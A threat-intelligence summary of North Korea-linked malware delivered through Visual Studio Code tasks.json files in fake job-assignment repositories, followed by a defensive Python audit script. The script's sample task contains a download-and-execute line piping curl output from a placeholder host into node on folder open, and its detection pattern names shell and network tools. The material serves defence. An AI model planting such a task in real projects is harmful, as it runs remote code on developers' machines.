Threat Actors Expand Abuse of Microsoft Visual Studio Code
3 months ago
- #DPRK
- #cybersecurity
- #malware
- Threat actors linked to North Korea (DPRK) are abusing Microsoft Visual Studio Code task configuration files (tasks.json) to deliver malware.
- Infection begins when victims clone and open malicious Git repositories, often disguised as recruitment or technical assignments.
- Visual Studio Code's trust prompt, if granted, allows automatic execution of embedded malicious commands from tasks.json.
- On macOS, the attack uses nohup bash -c and curl -s to fetch and execute a JavaScript payload via Node.js.
- Payloads are hosted on vercel.app, a platform increasingly used by DPRK-linked actors.
- The JavaScript backdoor provides remote code execution, system fingerprinting, and C2 communication.
- The malware collects hostname, MAC addresses, OS details, and public IP (via ipify.org) for fingerprinting.
- C2 beaconing occurs every 5 seconds, enabling dynamic JavaScript execution from attacker-controlled servers.
- Additional payloads retrieved post-infection show AI-assisted code generation traits and self-cleanup capabilities.
- Developers should vet repositories, avoid blindly trusting tasks.json, and scrutinize npm install scripts to prevent infection.
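As an added, defender-side example (written for this note, not code from the report or from Microsoft): a small Python audit that parses a cloned repository's .vscode/tasks.json, flags tasks VS Code would run automatically on folder open (the runOptions.runOn field), and reports the download-and-execute fragments named above (nohup bash -c, curl -s, node). The sample tasks.json is constructed and the URL in it is a placeholder.

```python
"""Audit a repository's .vscode/tasks.json for auto-run download-and-execute tasks.
Hypothetical helper written for this note; not code from the original report."""
import json
import re

AUTO_RUN = "folderOpen"  # trigger VS Code honours once the folder's trust prompt is accepted
# Fragments from the macOS chain above (nohup bash -c, curl -s, node) plus common peers.
SUSPICIOUS = re.compile(r"\b(nohup|curl|wget|node|bash\s+-c|sh\s+-c|base64)\b", re.I)

def strip_jsonc(text):
    """tasks.json is JSON-with-comments; drop comments and trailing commas before parsing."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    text = re.sub(r"^\s*//.*$", "", text, flags=re.M)
    return re.sub(r",(\s*[}\]])", r"\1", text)

def task_command(task):
    """Join a task's command and args into one string for inspection."""
    parts = [task.get("command", "")] + [str(a) for a in task.get("args", [])]
    return " ".join(p for p in parts if p)

def audit_tasks_json(text):
    """Return findings as dicts: label, severity, indicators, command."""
    findings = []
    for task in json.loads(strip_jsonc(text)).get("tasks", []):
        cmd = task_command(task)
        auto = task.get("runOptions", {}).get("runOn") == AUTO_RUN
        hits = sorted({m.group(0).lower() for m in SUSPICIOUS.finditer(cmd)})
        if auto and hits:
            sev = "high"    # runs on open AND fetches/executes remote content
        elif auto or hits:
            sev = "review"  # either property alone still deserves a look
        else:
            continue
        findings.append({"label": task.get("label", "?"), "severity": sev,
                         "indicators": hits, "command": cmd})
    return findings

# Constructed sample modelled on the chain described above; example.invalid is a placeholder.
SAMPLE_TASKS_JSON = r'''{
  // constructed sample
  "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm run build"},
    {"label": "setup", "type": "shell",
     "command": "nohup bash -c \"curl -s https://example.invalid/p.js | node\" &",
     "runOptions": {"runOn": "folderOpen"}}
  ]
}'''

if __name__ == "__main__":
    for f in audit_tasks_json(SAMPLE_TASKS_JSON):
        print(f["severity"], f["label"], f["indicators"], "->", f["command"])
```

Run it against the .vscode/tasks.json of a freshly cloned repository before accepting the trust prompt; a "high" finding is a reason to decline trust and inspect the task by hand.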